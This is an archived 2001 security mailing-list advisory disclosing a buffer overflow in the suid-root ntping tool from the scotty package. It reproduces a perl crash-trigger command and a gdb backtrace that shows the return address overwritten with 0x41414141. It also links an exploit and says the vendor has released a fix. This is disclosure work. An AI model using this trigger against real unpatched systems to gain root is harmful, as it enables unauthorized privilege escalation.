Date: Thu, 21 Jun 2001 10:55:48 -0400 (EDT)
From: "Larry W. Cashdollar" <[email protected]>
To: [email protected]
Subject: suid scotty (ntping) overflow (fwd)
This has circulated on vuln-dev; not sure if it made it here yet. The vendor
has been notified and has released a fixed version, 2.1.11.
My exploit:
http://vapid.dhs.org/ntping_exp.c
There is a much better exploit out there, but I am not sure if I have
permission to distribute it. So I will leave that to the author.
Credit: KF <[email protected]>
---------- Forwarded message ----------
Date: Tue, 12 Jun 2001 05:34:16 -0400
From: KF <[email protected]>
To: [email protected]
Subject: suid scotty (ntping) overflow
I am not sure that this made it on to the list the first time I sent it...
so sorry if this is a duplicate.
[root@linux d0tslash]# /usr/bin/ntping `perl -e 'print "A" x 9000'`
Segmentation fault (core dumped)
Vendor: http://wwwhome.cs.utwente.nl/~schoenw/scotty/
What led me to research this:
[email protected] (Michael Arndt) wrote:
> I run the scotty testsuite: what must I change on my system (Linux
> Slackware)?
> ==== Test generated error:
> can not connect straps socket: Permission denied
straps and ntping must be installed suid root.
^------- Hrmm I sure thought that was interesting to know *grin*
Vendors affected:
unknown to the author of this document.
Just a note I found, however...
<[email protected]>
Hi folks,
here is the long promised posting of all suid/sgid files on an alpha of
SuSE Linux 6.2 ... comments on wrong permissions are welcome.
Please note that SuSE has got 5 full CD-ROMs, so that's the reason for the
many, many files ... (and too many suid/sgid ones ...)
...
-rwsr-xr-x 1 root root 33370 Jun 30 11:11 ./usr/bin/ntping
-rwsr-xr-x 1 root root 18352 Jun 30 11:11 ./usr/bin/straps
...
[root@linux d0tslash]# gdb /usr/bin/ntping core
GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
Core was generated by
`AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libnsl.so.1...(no debugging symbols
found)...done.
Loaded symbols for /lib/libnsl.so.1
Reading symbols from /lib/libresolv.so.2...(no debugging symbols
found)...done.
Loaded symbols for /lib/libresolv.so.2
Reading symbols from /lib/libc.so.6...(no debugging symbols
found)...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0 0x40079b66 in getenv () from /lib/libc.so.6
(gdb) bt
#0 0x40079b66 in getenv () from /lib/libc.so.6
#1 0x4013aadb in inet_nsap_ntoa () from /lib/libc.so.6
#2 0x4013b9de in __res_ninit () from /lib/libc.so.6
#3 0x4013eb69 in __nss_hostname_digits_dots () from /lib/libc.so.6
#4 0x4013ff5f in gethostbyname () from /lib/libc.so.6
#5 0x080495b8 in _start ()
#6 0x41414141 in ?? ()
Cannot access memory at address 0x41414141
-KF